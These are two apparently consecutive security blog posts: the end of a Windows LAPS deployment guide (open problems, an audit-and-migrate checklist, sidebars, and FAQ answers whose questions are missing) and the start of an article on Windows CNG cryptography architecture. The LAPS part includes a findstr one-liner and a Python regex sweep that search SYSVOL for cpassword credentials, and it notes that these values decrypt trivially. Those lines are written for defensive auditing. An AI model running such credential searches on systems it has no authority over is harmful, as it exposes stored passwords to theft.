Retrieval-event audit gap (cross-directory)	Event 4662 SACL via `Set-LapsADAuditing`; Entra audit log; Defender for Identity hunting	DIY KQL unification across AD + Entra; no unified audit pane
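The coverage-report row above comes down to a join on a normalised device identifier. The sketch below shows the shape of that join against mock data. Every record shape here is hypothetical: the `inventory` array stands in for the fleet's own mapping table, and `expiresAt` is a millisecond timestamp assumed to have been extracted from each backend beforehand.

```javascript
// List devices that have no current LAPS password in either backend.
// `inventory` rows: { name, objectGuid?, entraDeviceId? } (hypothetical shape).
function coverageGaps(inventory, adRows, entraRows, now = Date.now()) {
  // Index each backend by its own surrogate key, lower-cased for comparison.
  const adExpiry = new Map(adRows.map((r) => [r.objectGuid.toLowerCase(), r.expiresAt]));
  const entraExpiry = new Map(entraRows.map((r) => [r.deviceId.toLowerCase(), r.expiresAt]));
  const isCurrent = (t) => typeof t === "number" && t > now;

  return inventory
    .filter((d) => {
      const ad = d.objectGuid ? adExpiry.get(d.objectGuid.toLowerCase()) : undefined;
      const entra = d.entraDeviceId ? entraExpiry.get(d.entraDeviceId.toLowerCase()) : undefined;
      return !isCurrent(ad) && !isCurrent(entra);
    })
    .map((d) => d.name);
}
```

The hard part in practice is not this function but building `inventory`: the mapping between AD `objectGuid`, Entra `deviceId`, and Intune device ID has to exist before any join can run.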

1. Legacy SYSVOL cpassword cleanup at scale. MS14-025 disabled new authoring twelve years ago; it never deleted what it patched [@ms14-025-bulletin]. No first-party Find-GPPPassword or Remove-GPPPassword cmdlet ships in the OS in 2026. PingCastle's A-PwdGPO rule and Semperis Purple Knight's equivalent scanner fill the gap [@pingcastle-rules]. The 2026 answer is: scan with a third-party tool, rotate the discovered credentials in whatever account-management primitive owns them, then delete the XML. The open question is why Microsoft has not shipped this in the twelve years since the bulletin. The blast-radius argument from 2014 -- "we cannot risk auto-deleting policy XMLs from SYSVOL" -- is now strictly weaker than the cleanup-tail argument that the residual artefacts keep showing up on internal pentest reports a decade later.

2. Cross-tenant and cross-directory LAPS coverage view. No portal-level "every Entra-joined and every AD-joined device that does not have a current LAPS password" report exists. Microsoft Intune compliance reports help on the Intune-managed side; Get-LapsADPassword -Identity * covers the AD side; Get-LapsAADPassword covers the Entra side. There is no single pane that unifies them. The 2026 answer is custom KQL or PowerShell that joins the three result sets on a normalised device identifier. The bottleneck is identity: Intune device IDs, AD objectGuid values, and Entra deviceId values are three different surrogate keys, and a fleet's mapping table is its own engineering investment.

3. Hybrid-joined BackupDirectory ambiguity. Microsoft Learn's current guidance is that hybrid-joined devices should typically use BackupDirectory = 2 (AD) when on-premises AD is the canonical identity store, and may use BackupDirectory = 1 (Entra) when Intune is the primary policy-delivery mechanism [@ms-laps-entra-scenarios]. In practice, the documentation hedges, and many shops configure both directions (one via GPO, one via Intune CSP) and rely on the per-device evaluation order to pick one. The result is a coverage-verification problem: a device that is "configured for AD backup" by GPO and "configured for Entra backup" by CSP can end up with the password in either backend, and the source of truth depends on policy precedence rules most operators do not memorise.

4. Windows 11 25H2 Administrator Protection and LAPS interaction. Administrator Protection's per-elevation transient admin tokens and Windows LAPS's recoverable break-glass password are operationally adjacent but architecturally disjoint [@tc-admin-protection-win11]. The documentation covers each feature on its own; the interaction matrix -- "what does a LAPS-managed RID 500 look like under Administrator Protection on a Win 11 25H2 host" -- is not laid out in one place. Tier-0 architects who want both behaviours have to assemble the answer from two product pages.

5. LDAP channel binding and signing enforcement migration. Microsoft has been hardening LDAP channel binding through a multi-year 2020-2024 enforcement push tracked under KB4520412 [@kb4520412-canonical]. The original March 10, 2020 update introduced Channel Binding Token (CBT) signing events 3039, 3040, and 3041; the manual enablement step was removed on November 14, 2023 for Windows Server 2022 and on January 9, 2024 for Windows Server 2019, after which the hardening became the default posture; starting with Windows Server 2022 23H2, all new versions ship with the full set of changes in the KB applied [@kb4520412-canonical]. Tooling that does not speak LDAPS-with-channel-binding will break when enforcement reaches its terminal state. Modern attack-graph tooling -- bloodyAD [@bloodyad-repo] and the lapsv2decrypt reference implementation [@lapsv2decrypt-repo] -- has tracked the changes. Not every Linux pentest stack has. Practitioners building Linux-based LAPS retrieval pipelines should validate their stack against the channel-binding-required posture before the enforcement wave reaches them.

6. The retrieval-event audit gap (cross-directory). Active Directory does not natively log every read of msLAPS-EncryptedPassword; Set-LapsADAuditing installs a SACL that emits Directory Service event 4662 for configured attribute reads [@ms-laps-set-adauditing]. Microsoft Entra ID logs LAPS retrieval through its own audit log, surfaced via the Graph endpoint [@ms-graph-localcredinfo]. The two log streams have different schemas, different timestamp normalisations, and different principal identifiers. Cross-pane unification of "who read which LAPS password when" across both backends is a DIY engineering problem in 2026. Microsoft Defender for Identity surfaces some of the AD-side reads under the Compromised Credentials and Lateral Movement categories [@ms-defender-alerts] but does not name LAPS specifically in the public alert taxonomy.
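The unification work described in the last open problem is mostly schema normalisation. The following sketch merges two mock streams into one timeline. Both input schemas are hypothetical simplifications invented for this example; they are not the real event 4662 layout or the real Entra audit-log schema, and the field names would need mapping from whatever the log pipeline actually emits.

```javascript
// Normalise AD-side and Entra-side LAPS read records into one sorted timeline.
// Input field names are hypothetical placeholders for the real log schemas.
function unifyLapsReads(adEvents, entraEvents) {
  const fromAd = adEvents.map((e) => ({
    when: new Date(e.timeCreated).toISOString(), // normalise to UTC ISO 8601
    who: e.subjectUserName.toLowerCase(),
    device: e.objectName.toLowerCase(),
    backend: "AD",
  }));
  const fromEntra = entraEvents.map((e) => ({
    when: new Date(e.activityDateTime).toISOString(),
    who: e.initiatedBy.toLowerCase(),
    device: e.targetDevice.toLowerCase(),
    backend: "Entra",
  }));
  // Fixed-width UTC ISO strings sort chronologically as plain strings.
  return [...fromAd, ...fromEntra].sort((a, b) => a.when.localeCompare(b.when));
}
```

Principal identifiers remain the unsolved part: lower-casing is only a placeholder for a real mapping between on-premises account names and Entra user principal names.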

The threshold-cryptography open problem (an $m$-of-$n$ Shamir scheme over the LAPS password protector, with $m \geq 2$ in tier-0 fleets) is theoretically closed by the 1979 Shamir secret-sharing construction. The deployment-side block is that no Microsoft-shipped primitive wires the construction to the LAPS rotation pipeline. Adjacent shipping primitives (Azure Managed HSM key-release [@ms-mhsm-policy-grammar], Azure Confidential Ledger [@ms-conf-ledger]) exist on the Azure side, but the integration with on-premises LAPS clients is not on any public roadmap. The companion posts on DPAPI internals (#20) and Defender for Identity (#87) cover adjacent territory but do not close this gap.

None of those six dissolves the architectural lesson the eleven-year arc taught: the right defaults take a decade to ship. Here is the practitioner field manual for the meantime.

11. Practitioner Field Manual and FAQ

What follows is a seven-step deployment list, three named sidebars that surface the most common misconceptions, and a seven-question FAQ. Lift the step list verbatim into your deployment runbook; the sidebars exist because the article would not be defensible without them.

The audit-and-migrate seven-step list

1. Audit SYSVOL for cpassword first. Run PingCastle's A-PwdGPO (MITRE T1552.006) [@pingcastle-rules; @mitre-t1552-006] before touching anything else. A Windows triage one-liner -- `findstr /s /i cpassword \\domain\SYSVOL\*.xml` -- will finish on most environments in under a minute. Remediate the discovered XML files (rotate the underlying account passwords, then delete the XMLs) before deploying Windows LAPS so the attack surface and the defence are not co-evolving in the same window.
2. Extend the AD schema for Windows LAPS. Run `Update-LapsADSchema` once per forest from an account in the Schema Admins group. The cmdlet is idempotent and coexists with the legacy `ms-Mcs-AdmPwd` attribute on the same Computer object [@ms-laps-mig-scenarios].
3. Delegate. Run `Set-LapsADComputerSelfPermission` on each target OU so that computer accounts can write their own `msLAPS-*` attributes. Audit existing "All Extended Rights" delegations with `Find-LapsADExtendedRights` and remove any that do not have an explicit operational justification [@ms-laps-ps-overview]. This is the legacy-LAPS lesson applied to the new attribute set.
4. Configure encryption-at-rest. Verify that the domain functional level (DFL) is Windows Server 2016 or higher. Configure `ADPasswordEncryptionEnabled = 1` explicitly even though the default is True -- the explicit configuration makes the choice visible in policy audits and forces the operator to verify the DFL prerequisite [@ms-laps-policy-settings]. Assign `ADPasswordEncryptionPrincipal` to a dedicated LAPS-DPAPI-Decryptors group, not Domain Admins [@ms-laps-concepts-overview].
5. Deploy policy. GPO for AD-joined, Intune CSP for Entra-joined and hybrid-joined [@ms-laps-csp]. Settings as per section 7's baseline table. Validate via `Get-LapsADPassword -Identity <computer>` against a representative sample of hosts after the first one-hour rotation timer has fired [@ms-laps-get-adpassword].
6. Migrate from legacy LAPS. Use the documented coexistence pattern: the legacy MSI's CSE keeps running against the built-in RID 500, the new in-box LAPS takes over against a named secondary local-admin account, then retire the legacy `ms-Mcs-AdmPwd` schema readers and uninstall the MSI once Windows LAPS coverage is verified [@ms-laps-mig-scenarios]. The legacy MSI's installation is blocked on Windows 11 23H2 and later [@ms-laps-msi-download].
7. Continuous audit. PingCastle for coverage rules (A-LAPS-Not-Installed, A-LAPS-Joined-Computers, and the GPP A-PwdGPO) [@pingcastle-rules]; BloodHound for the ReadLAPSPassword edge across the graph [@bloodhound-edge-readlaps]; Defender for Identity for downstream behaviour under Compromised Credentials and Lateral Movement [@ms-defender-alerts]; and a custom KQL on the Entra audit log for LapsPasswordRetrieved events. None of these is optional in a deployment that intends to detect compromise.
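For teams that want the step-one triage in a script rather than a console one-liner, the sweep can be sketched in a few lines of Python. This is a minimal illustration, not a replacement for PingCastle: the function name `find_cpassword_files` is hypothetical, the root path is whatever local or mounted copy of SYSVOL you point it at, and it only flags files with a non-empty `cpassword` attribute.

```python
import os
import re

# Non-empty cpassword="..." attribute, matched case-insensitively.
# Empty cpassword="" attributes are ignored because they carry no secret.
CPASSWORD_RE = re.compile(r'cpassword\s*=\s*"[^"]+"', re.IGNORECASE)


def find_cpassword_files(root):
    """Return sorted paths of .xml files under `root` holding a non-empty cpassword."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as handle:
                    if CPASSWORD_RE.search(handle.read()):
                        hits.append(path)
            except OSError:
                continue  # unreadable file: skip it and keep sweeping
    return sorted(hits)
```

Calling `find_cpassword_files(path_to_sysvol_copy)` returns the list of files to remediate; an empty list means the sweep found nothing under that root, not that the forest is clean.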

Sidebar A: MS16-072 is NOT the LAPS attribute-readability bulletin

A recurring misattribution credits MS16-072 / KB3163622 / CVE-2016-3223 (June 14, 2016) [@ms16-072-bulletin; @ms16-072-kb; @cve-2016-3223] with closing the legacy LAPS attribute-readability issue. It does not. MS16-072 is a Group Policy retrieval-context fix: it moved user-side GPO fetch into the computer's security context to defeat a man-in-the-middle class on policy traffic. The actual LAPS attribute-readability issue -- "All Extended Rights" delegations silently including CONTROL_ACCESS on the CONFIDENTIAL ms-Mcs-AdmPwd attribute -- has no Microsoft-assigned CVE or bulletin. The canonical write-up is Sean Metcalf's August 2016 ADSecurity piece [@adsec-laps-2016], and the operational primitive is SpecterOps's ReadLAPSPassword BloodHound edge [@bloodhound-edge-readlaps].

Sidebar B: "Hybrid joined" is not "Hybrid Worker"

Microsoft Entra hybrid joined devices are workstations joined to both an on-premises AD domain and Microsoft Entra ID. The LAPS conversation about hybrid joined is a BackupDirectory choice. Azure Automation Hybrid Runbook Workers, on the other hand, are an Azure Automation primitive -- worker processes that execute Automation runbooks against on-premises resources. They share a word and nothing else. A LAPS policy targeted at "hybrid devices" means hybrid joined; it has nothing to do with hybrid runbook workers. The article's section 8 includes the same disambiguation because operators conflate them with surprising frequency.

Sidebar C: How GPP cpassword still gets found in 2026

MS14-025 disabled new authoring but did not delete the artefacts [@ms14-025-bulletin]. The artefacts persist because SYSVOL replication is conservative -- nothing in the forest's design deletes anything from SYSVOL just because the editor UI was hot-patched on the administrative workstation. A fresh PingCastle scan against a long-lived forest will routinely surface 2010-era Groups.xml files [@pingcastle-rules], and the third-party scanner cohort is the only practical defence. The one-shot remediation pattern is: find with A-PwdGPO, rotate the underlying password via the replacement tool (Windows LAPS for built-in local admin; a PAM vault for service accounts that were stored in GPP), then delete the Groups.xml and let SYSVOL replication propagate the deletion.

No. Administrator Protection addresses in-session UAC-class elevation by brokering each elevation through a per-elevation transient shadow-admin identity [@tc-admin-protection-win11]; it does not provide a recoverable break-glass password for an off-network or non-bootable endpoint. The two systems are orthogonal and Microsoft recommends running them together on Windows 11 25H2 fleets. Replacing LAPS with Administrator Protection produces designs that lose the recovery primitive for laptops that have wandered off the corporate network for a year.

Defence in depth, plus a coverage-leak primitive. An LDAP reader who is not in `ADPasswordEncryptionPrincipal` gets only an opaque ciphertext blob [@ms-laps-concepts-overview] -- but the same reader can still enumerate which computer objects have a current `msLAPS-EncryptedPassword`, which gives them target-selection telemetry on managed-versus-unmanaged hosts. The canonical write-up of this class is Sean Metcalf's August 2016 ADSecurity piece on the legacy `ms-Mcs-AdmPwdExpirationTime` attribute [@adsec-laps-2016], and the architectural lesson carries forward to Windows LAPS unchanged.

Yes, in seconds. The 32-byte AES-256-CBC key is published verbatim in `[MS-GPPREF]` section 2.2.1.1.4 of Microsoft's Open Specifications corpus [@ms-gppref-aes-key] and that publication is permanent under the Open Specifications Promise. Any residual `Groups.xml` (or five sibling carriers including the asymmetric `Printers.xml` [@rewtdance-gpp-2012]) in SYSVOL that contains a `cpassword` attribute is operationally plaintext. The 2026 answer is to find them with PingCastle's `A-PwdGPO` rule [@pingcastle-rules] and remediate -- not to expect the artefacts to expire on their own.

No. The rotation cycle is the `PasswordAgeDays` interval (default 30 days, minimum 1 on AD backup, minimum 7 on Entra backup) [@ms-laps-policy-settings]. After authentication, `PostAuthenticationActions` (default `3` = reset + sign out) fires once the `PostAuthenticationResetDelay` window (default 24 hours) has elapsed. Value `11` (Windows 11 24H2 / Server 2025+) adds termination of remaining processes; it is *not* a forced shutdown without warning -- the standard two-minute warning still applies and SMB sessions are deleted.

Yes. LAPS rotates the password on a disabled account; the account simply cannot be used to log on until it is enabled. The break-glass runbook is: enable the account, retrieve the LAPS password, perform the recovery, rotate immediately, re-disable. On Windows 11 24H2 and Windows Server 2025 and later, Microsoft's recommendation is to enable Automatic Account Management with a randomised name and `AutomaticAccountManagementEnableAccount = 0` so the managed account ships disabled-by-default with a non-predictable name [@ms-laps-account-modes]. The pattern defeats predictable-RID-500 enumeration entirely.

Microsoft Entra ID. With `BackupDirectory = 1` [@ms-laps-policy-settings], the local LAPS component posts the rotated password to the `deviceLocalCredentials` resource on the Entra device object via Microsoft Graph [@ms-graph-localcredinfo]. Retrieval is via `Get-LapsAADPassword` (a wrapper around the Graph endpoint), the Microsoft Entra portal Devices blade, or a direct `GET /directory/deviceLocalCredentials/{deviceId}` call [@ms-laps-entra-scenarios]. Read permission requires the Cloud Device Administrator or Intune Service Administrator Entra role.

No. `CanReadGMSAPassword` is the edge for **Group Managed Service Accounts** -- a different Active Directory feature with a different ACL on a different attribute (`msDS-GroupMSAMembership`). The correct LAPS edge is **`ReadLAPSPassword`**, introduced in BloodHound 2.0 on August 7, 2018 [@specterops-bh2], and the current edge documentation covers both the legacy `ms-Mcs-AdmPwd` and the modern `msLAPS-*` attribute paths [@bloodhound-edge-readlaps].
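The numeric bounds quoted in these answers and in the article's baseline are easy to get wrong in a policy review, so a small checker can help. The sketch below is an assumption-laden illustration: the dictionary shape and the function name `check_laps_baseline` are hypothetical, the setting names and limits are the ones stated in this article, and treating both `3` and `11` as acceptable `PostAuthenticationActions` values is my reading of the baseline rather than a Microsoft rule.

```python
def check_laps_baseline(policy):
    """Return a list of findings; an empty list means the policy matches the baseline."""
    findings = []

    backup = policy.get("BackupDirectory")
    if backup not in (1, 2):
        findings.append("BackupDirectory should be 1 (Entra) or 2 (AD)")

    # Minimum age differs by backup target: 7 days on Entra, 1 day on AD.
    min_age = 7 if backup == 1 else 1
    age = policy.get("PasswordAgeDays", 30)
    if not min_age <= age <= 30:
        findings.append(f"PasswordAgeDays={age} is outside {min_age}..30")

    if backup == 2:
        if not policy.get("ADPasswordEncryptionEnabled", True):
            findings.append("ADPasswordEncryptionEnabled is off")
        principal = policy.get("ADPasswordEncryptionPrincipal", "")
        # An unset principal falls back to Domain Admins, which the baseline avoids.
        if not principal or principal.split("\\")[-1].lower() == "domain admins":
            findings.append("ADPasswordEncryptionPrincipal should be a dedicated group")

    if policy.get("PostAuthenticationActions", 3) not in (3, 11):
        findings.append("PostAuthenticationActions should be 3 (or 11 on 24H2+)")

    return findings
```

Feeding it an exported policy as a dictionary, for example `{"BackupDirectory": 1, "PasswordAgeDays": 3}`, yields one finding for the too-short Entra rotation interval.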

The companion posts in this series cover Pass-the-Hash itself (#76), DPAPI internals (#20), Microsoft Entra Privileged Identity Management (#90), Active Directory tiering (#72), Microsoft Defender for Identity (#87), and BloodHound (#77). Each of those is referenced in this article at the point where the topic would otherwise demand a digression; each has its own deep treatment elsewhere.

Twenty years. Eleven years of which separated Microsoft's December 2012 articulation of the architecture from the April 11, 2023 in-box default [@ms-pth-whitepaper; @tc-windows-laps-ga-2023]. Four residual attack surfaces -- delegated-decryptor compromise, the pre-rotation OPSEC tail, BYOD endpoints, and the multi-decade MS14-025 cleanup tail [@ms14-025-bulletin] -- still resist the architecture rather than fall to it. One through-line: this is what shipping the right default a decade late looks like. The right defaults are now in the box. The directory is still tier 0. Somebody still has to break the glass. The architectural game from here is not to invent a new generation; it is to make sure the one we finally have is actually deployed, audited, and clean.

CNG Architecture: BCrypt, NCrypt, KSPs, and How Windows Picks Its Algorithms

noreply@paragmali.com (Parag Mali) — Sat, 16 May 2026 00:00:00 GMT

Since Windows Vista, every piece of cryptography in Windows -- TLS, BitLocker, Authenticode, Windows Hello, DPAPI -- flows through the **Cryptography API: Next Generation (CNG)**. CNG splits the world into two layers. **BCrypt** does primitives: AES, SHA, HMAC, RNG, key derivation. **NCrypt** routes calls to a **Key Storage Provider (KSP)** that owns the long-lived private keys: software, TPM, smart card, or a third-party HSM. Algorithm selection is governed by a registered provider-priority list, the Schannel cipher-suite order, and a single FIPS-mode toggle that flips Windows into its validated subset. Windows 11 24H2 added the first post-quantum primitives (ML-KEM, ML-DSA) to the same surface, with no API break. This article walks through how that machine works, why Microsoft designed it that way, and where it leaks.

1. From CAPI to CNG: why Microsoft started over

In the late 1990s, Microsoft shipped its first general cryptographic API. The original Cryptographic Service Providers (CAPI) model [@learn-microsoft-com-service-providers] arrived in Windows NT 4.0 Service Pack 4 in 1998 and defined a plug-in unit called a Cryptographic Service Provider, or CSP. A CSP was a monolithic DLL: it owned the algorithm implementations, the key storage, and the export-control posture all at once. If you wanted to add hardware-backed RSA on Windows NT, you wrote a CSP. If you wanted to add a new hash function, you also wrote a CSP. The model worked for the algorithms Microsoft had in mind when it designed it.

Then the algorithms changed.

AES was standardized in 2001, after CAPI's design was already frozen. Microsoft retrofitted AES into the original architecture by shipping the Microsoft Enhanced RSA and AES Cryptographic Provider [@learn-microsoft-com-cryptographic-provider] as a separate CSP, sitting alongside the original Microsoft Base Cryptographic Provider. Elliptic-curve cryptography was even more awkward: CAPI's algorithm identifiers and key-blob formats had no place for ECC curves. Every new algorithm required a new CSP or a new release of an existing one. The plug-in surface was rigid, the FIPS validation story was painful, and the API was relentlessly C-shaped in ways that made auditing hard.

Microsoft was not alone. The same era produced Intel's Common Data Security Architecture (CDSA) [@en-wikipedia-org-os-2] and several short-lived crypto frameworks for OS/2 and other platforms. Most of them disappeared. CAPI's longevity owed more to Windows market share than to its design.

By 2005, Microsoft started over. The result was the Cryptography API: Next Generation, or CNG, which shipped with Windows Vista in January 2007 and with Windows Server 2008 the following year [@learn-microsoft-com-cng-portal]. CNG was not a refactor. It was a clean second system, designed from a different set of assumptions: algorithms would keep arriving, key storage needed to be a separate concern, FIPS validation had to be a first-class output, and the same API had to work in user mode and kernel mode.

Cryptography API: Next Generation (CNG): The Windows cryptographic API introduced in Vista (2007) as the long-term replacement for CAPI. CNG splits cryptography into a primitives layer (`bcrypt.h`, `bcryptprimitives.dll`) and a key-storage layer (`ncrypt.h`, `ncrypt.dll`), each pluggable through registered providers. Used by every modern Windows component that touches cryptography.

Cryptographic Service Provider (CSP): The plug-in unit of the legacy CAPI architecture (1998-onward). A CSP bundled algorithms, key storage, and FIPS posture into a single DLL. Largely superseded by CNG providers, but still present on the system for backwards compatibility.

The three design pillars Microsoft committed to in the CNG portal documentation were modularity, cryptographic agility, and FIPS-compliance readiness [@learn-microsoft-com-cng-features]. All three would matter twenty years later when post-quantum cryptography arrived without warning the protocol authors. We will get to that.

Throughout this article, "BCrypt" refers to Microsoft's CNG primitives header `bcrypt.h` and its companion DLL `bcryptprimitives.dll`. It is not the Provos-Mazieres password-hashing function of the same name, which is unrelated and uses a different spelling in most academic literature ("bcrypt"). The naming collision is unfortunate but firmly entrenched in Windows.

2. BCrypt: the symmetric stack and the ephemeral key

Open a Visual Studio project, include <bcrypt.h>, link bcrypt.lib, and you have access to almost every cryptographic primitive Windows ships. AES in CBC, CFB, ECB, GCM, and CCM modes. SHA-1, SHA-256, SHA-384, SHA-512, the SHA-3 family, and the cSHAKE128 and cSHAKE256 extendable-output functions added in Windows 11 24H2 [@learn-microsoft-com-algorithm-identifiers]. HMAC over any of those hashes. PBKDF2. The NIST SP 800-108 key-derivation construction. The DRBG-based random number generator drawn from NIST SP 800-90 [@csrc-nist-gov-1-final]. Ephemeral asymmetric operations -- RSA encrypt, ECDSA sign, ECDH key agreement -- on key handles that vanish when the process exits.

The canonical BCrypt opening dance is four calls.

```
// Pseudocode mirroring the BCryptOpenAlgorithmProvider flow.
// In real C: NTSTATUS values, BCRYPT_ALG_HANDLE, etc.

const algId = "AES";   // wide string
const impl = null;     // null -> walk the priority list
const flags = 0;

const hAlg = BCryptOpenAlgorithmProvider(algId, impl, flags);
BCryptSetProperty(hAlg, "ChainingMode", "ChainingModeGCM");

const hKey = BCryptGenerateSymmetricKey(hAlg, keyBytes);
const ciphertext = BCryptEncrypt(hKey, plaintext, authInfo);

BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
```

The interesting parameter is impl. When it is NULL, BCryptOpenAlgorithmProvider "attempts to open each registered provider, in order of priority, for the algorithm specified by the pszAlgId parameter and returns the handle of the first provider that is successfully opened" [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider]. That sentence is the whole story of CNG provider priority in thirty words.
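The first-success walk that the quoted sentence describes can be modelled in a few lines. This is a toy model of the documented behaviour, not CNG's implementation: the `registry` dictionary, the `ProviderError` type, and the opener callables are all hypothetical stand-ins for the configuration store and the provider DLLs.

```python
class ProviderError(Exception):
    """Raised by a provider opener that cannot serve the request."""


def open_algorithm_provider(alg_id, registry, impl=None):
    """Return (provider_name, handle) from the first provider that opens.

    registry maps an algorithm id to an ordered list of (name, opener) pairs,
    highest priority first. Passing impl pins the lookup to one provider.
    """
    candidates = registry.get(alg_id, [])
    if impl is not None:
        candidates = [(name, opener) for name, opener in candidates if name == impl]
    for name, opener in candidates:
        try:
            return name, opener()
        except ProviderError:
            continue  # this provider declined; fall through to the next one
    raise LookupError(f"no provider could open {alg_id!r}")
```

With `impl=None` a failing high-priority provider is skipped silently, which is exactly why the order of the list, rather than the caller, decides which implementation runs.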

Algorithm identifiers are wide strings. L"AES", L"SHA256", L"RSA", L"ML-KEM", L"ML-DSA", L"CHACHA20_POLY1305", L"CSHAKE128". Each string is registered in CNG's configuration store under HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\, with a per-algorithm ordered list of providers that claim to implement it. Add a new algorithm and you add a new string. Add a new provider and you append to its priority list. The API surface does not change.

Note: The algorithm-identifier string is the seam where cryptographic agility lives. As long as your protocol can encode "use whatever the spec calls AES-256-GCM," and as long as a CNG provider answers to that name, you can swap implementations without touching the calling code. Protocols whose wire format hard-codes the algorithm (the old SSL 3.0 cipher list, for example) do not get this benefit no matter what crypto API they call.
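The same seam can be shown outside Windows. The sketch below uses Python's `hashlib`, not CNG, purely as an analogy: the algorithm name travels with the value, so switching from SHA-256 to SHA3-256 changes data, not calling code. The `tag` and `verify` helpers, the `alg:hex` wire format, and the `ALLOWED` set are hypothetical and exist only for illustration.

```python
import hashlib
import hmac

# The verifier pins the names it is willing to accept; without an allowlist
# an attacker-chosen name could downgrade the check to a weak algorithm.
ALLOWED = {"sha256", "sha3_256"}


def tag(alg_name, data):
    """Return 'alg:hexdigest' so the algorithm choice is part of the wire format."""
    if alg_name not in ALLOWED:
        raise ValueError(f"algorithm {alg_name!r} is not allowed")
    return f"{alg_name}:{hashlib.new(alg_name, data).hexdigest()}"


def verify(tagged, data):
    """Recompute the digest with whatever allowed algorithm the tag names."""
    alg_name, _, expected = tagged.partition(":")
    if alg_name not in ALLOWED:
        return False
    actual = hashlib.new(alg_name, data).hexdigest()
    return hmac.compare_digest(actual, expected)
```

A caller that stored `tag("sha256", blob)` yesterday and `tag("sha3_256", blob)` today verifies both with the same `verify` call, which is the property a hard-coded wire format cannot offer.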

Underneath the API is a single implementation library. Microsoft's SymCrypt [@github-com-microsoft-symcrypt] has been the actual workhorse since Windows 10 version 1703: "SymCrypt is the core cryptographic function library currently used by Windows... Since the 1703 release of Windows 10, SymCrypt has been the primary crypto library for all algorithms in Windows." SymCrypt is open source. It carries hand-tuned assembly for AES-NI, VAES, SHA-NI, and PCLMULQDQ on x64, plus ARM64 SHA and AES intrinsics. On a modern Xeon, AES-GCM throughput from BCrypt routinely sits in the 4 to 8 GB/s range per core.

SymCrypt's open-source release in 2019 was a quiet event for a Microsoft library: the algorithms that protect Windows are reviewable by anyone willing to read C and ARM/x64 assembly.

BCrypt keys are ephemeral by construction. A BCRYPT_KEY_HANDLE lives in your process and dies with it. If you want to keep a private key around between processes, between reboots, or between machines, you do not use BCrypt. You use NCrypt.

That distinction is the first thing developers get wrong when they meet CNG. The second thing they get wrong is forgetting that BCrypt's GCM API does not allocate nonces for you. The NIST SP 800-38D specification of Galois/Counter Mode [@nvlpubs-nist-gov-nistspecialpublication800-38dpdf] is famously brittle under nonce reuse: a single repeated nonce under the same key destroys both confidentiality (XOR of plaintexts leaks) and authenticity (the GHASH authentication key becomes recoverable). With 96-bit random nonces the birthday bound limits safe usage to roughly $2^{32}$ invocations per key before collision probability becomes meaningful. Counter-based nonces sidestep the birthday bound entirely but require persistent state. CNG does neither for you. That part is your problem.
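The arithmetic behind that limit, and the counter alternative, fit in a short sketch. Assumptions are labelled: `collision_probability_bound` is the standard union bound n(n-1)/2 divided by 2^96, and `CounterNonce` is a hypothetical helper that builds a 12-byte nonce from a 4-byte fixed field and an 8-byte counter. Persisting the counter across restarts is left to the caller, which is precisely the state requirement the paragraph mentions.

```python
from fractions import Fraction

NONCE_BITS = 96


def collision_probability_bound(invocations, nonce_bits=NONCE_BITS):
    """Union bound on the chance that any two uniformly random nonces collide."""
    n = invocations
    return Fraction(n * (n - 1), 2 * 2**nonce_bits)


class CounterNonce:
    """12-byte nonce: 4-byte fixed field followed by an 8-byte big-endian counter."""

    def __init__(self, fixed_field, start=0):
        if len(fixed_field) != 4:
            raise ValueError("fixed field must be exactly 4 bytes")
        self._fixed = bytes(fixed_field)
        self._next = start  # caller must persist this value across restarts

    def next(self):
        if self._next >= 2**64:
            raise OverflowError("counter exhausted; rotate the key")
        nonce = self._fixed + self._next.to_bytes(8, "big")
        self._next += 1
        return nonce
```

At 2^32 random nonces the bound comes out just under 2^-33, which is why that invocation count is treated as the ceiling per key; the counter variant never collides as long as the stored counter is never rolled back.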

Note: First, GCM nonce reuse: BCryptEncrypt with BCRYPT_CHAIN_MODE_GCM accepts whatever 12 bytes you hand it. Counter or random, but never twice. Second, algorithm string drift: BCRYPT_SHA256_ALGORITHM is the macro for L"SHA256". L"SHA-256" returns STATUS_NOT_FOUND. Third, kernel-mode pseudo-handles: the convenient BCRYPT_AES_ALG_HANDLE shortcut is user-mode only per the BCryptOpenAlgorithmProvider remarks [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider]; kernel drivers must use real handles.

Windows 10 added pseudo-handles -- pre-baked handle constants like BCRYPT_AES_ALG_HANDLE and BCRYPT_SHA256_ALG_HANDLE -- that skip the provider lookup for the built-in algorithms. The 24H2 release extended that list to include BCRYPT_MLKEM_ALG_HANDLE and the cSHAKE handles. Microsoft now recommends pseudo-handles over BCryptOpenAlgorithmProvider for new code [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider] when the algorithm is built in. The motivation is performance: pseudo-handles bypass the per-call provider walk and the configuration-store lookup.

That covers the primitives. Now we need a place to keep the keys.

3. NCrypt: where the long-lived secrets live

The ncrypt.h header opens a different door. Every function in the NCrypt API surface [@learn-microsoft-com-api-ncrypt] -- NCryptOpenStorageProvider, NCryptCreatePersistedKey, NCryptOpenKey, NCryptSignHash, NCryptDecrypt, NCryptKeyDerivation, NCryptExportKey, NCryptProtectSecret -- begins by routing the call through ncrypt.dll, which acts as a router rather than an implementation. The router decides which Key Storage Provider handles the operation and forwards the call.

That routing layer is the architectural distinction Microsoft has insisted on for two decades. Microsoft's Key Storage and Retrieval documentation [@learn-microsoft-com-and-retrieval] describes it like this: the NCrypt router "conceals details, such as key isolation, from both the application and the storage provider itself." Translation: the application calls NCryptSignHash and gets back a signature. It does not know -- and should not need to know -- whether the key lives in %APPDATA%, inside a TPM chip on the motherboard, on a smart card halfway across the room, or in a network-attached hardware security module in a data center on a different continent.

Key Storage Provider (KSP): A registered plug-in DLL that owns persistent private-key material and exposes it through the NCrypt API. Microsoft ships four built-in KSPs (Software, Platform/TPM, Smart Card, and the CNG-DPAPI provider); third parties ship KSPs for HSM appliances, USB security keys, and cloud key services. Selecting a KSP is a matter of passing the right name string to `NCryptOpenStorageProvider`.

The mechanical flow for creating a persisted key looks like this.

sequenceDiagram
participant App as Application
participant Router as ncrypt.dll (NCrypt router)
participant KSP as Microsoft Software KSP
participant LSA as LSA key-isolation process
